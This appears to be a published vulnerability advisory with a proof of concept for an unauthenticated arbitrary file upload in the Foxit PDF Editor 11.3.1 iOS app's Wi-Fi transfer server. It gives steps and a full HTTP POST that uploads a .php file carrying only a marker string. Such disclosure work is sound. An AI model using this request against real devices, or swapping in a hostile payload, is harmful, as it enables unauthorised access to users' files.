Authored by Saud Alenazi

Foxit PDF Editor (iOS) version 11.3.1 suffers from an arbitrary file upload vulnerability.

# Exploit Title: Foxit PDF Editor (iOS) - Arbitrary File Upload (Unauthenticated)
# Date: 24/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.foxit.com
# Software Link: https://apps.apple.com/us/app/foxit-pdf-editor/id507040546
# Version: 11.3.1
# Tested: iPhone 6 iOS 12.4.7
# Contact: https://twitter.com/dmaral3noz


- Description :

An arbitrary file upload web vulnerability has been discovered in the Foxit PDF Editor v11.3.1 iOS mobile application.
The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service

- Steps :

1- Download and install the Foxit PDF Editor iOS application
2- open App and go to Files
3- Click Pc (File transfer with wifi)
4- Enable File Transferring
5- Index of Documents (http://localhost:8888) , you can upload any extension


- Request :

POST / HTTP/1.1
Host: localhost:8888
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryC2M8Dmj739BtPV2n
Origin: http://localhost:8888
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/604.1
Connection: close
Upgrade-Insecure-Requests: 1
Referer: http://localhost:8888/
Content-Length: 304

------WebKitFormBoundaryC2M8Dmj739BtPV2n
Content-Disposition: form-data; name="button"; filename="s3od.php"
Content-Type: application/octet-stream

0xSaudi
------WebKitFormBoundaryC2M8Dmj739BtPV2n
Content-Disposition: form-data; name="button"

Upload
------WebKitFormBoundaryC2M8Dmj739BtPV2n--


****************************

Path File : http://localhost:8888/s3od.php

****************************